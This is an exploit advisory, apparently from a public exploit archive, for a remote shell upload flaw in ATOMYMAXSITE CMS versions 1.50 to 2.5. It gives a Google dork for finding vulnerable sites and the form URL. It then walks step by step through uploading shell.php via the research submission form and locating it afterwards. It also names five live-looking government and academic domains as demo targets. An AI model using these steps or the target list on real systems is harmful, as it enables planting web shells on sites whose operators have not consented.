#######################################################
#
# [+] Exploit Title: ATOMYMAXSITE CMS Remote Shell Upload Vulnerability
# [+] Google Dork: "Powered by ATOMYMAXSITE"
# [+] Date: 30/06/2013
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Vendor Homepage: http://board.maxsitepro.com
# [+] Version: All Version [1.50 - 2.5]
# [+] Tested on: Windows 7
#
#######################################################
#
# [+] Exploit:
#
# [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
#
#######################################################
#
# [+] Proof:
#
# [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
# [+] Then fill in all the information requested
# [+] Now click on the Browse front of ผลงานฉบับเต็ม(Fultext) and select shell.php
# [+] Now click on the button below the form to be registered
# [+] http://localhost/[path]/index.php?name=research
# [+] Now select the first record and click the (FullText)
# [+] (FullText) = Path shell.php
#
#######################################################
#
# [+] Demo site:
#
# [+] http://plan.chon1.go.th
# [+] http://tbacud.ac.th
# [+] http://www.nitedcpm1.net
# [+] http://ict.chon1.go.th/home/
# [+] http://www.chiangdaocity.go.th/home
#
#######################################################
#
# [+] Discovered By : Black.Hack3r
# [+] We Are : M.R.S.CO,Black.Hack3r,N3O,UB313
# [+] Home : http://www.idc-team.net
#
#######################################################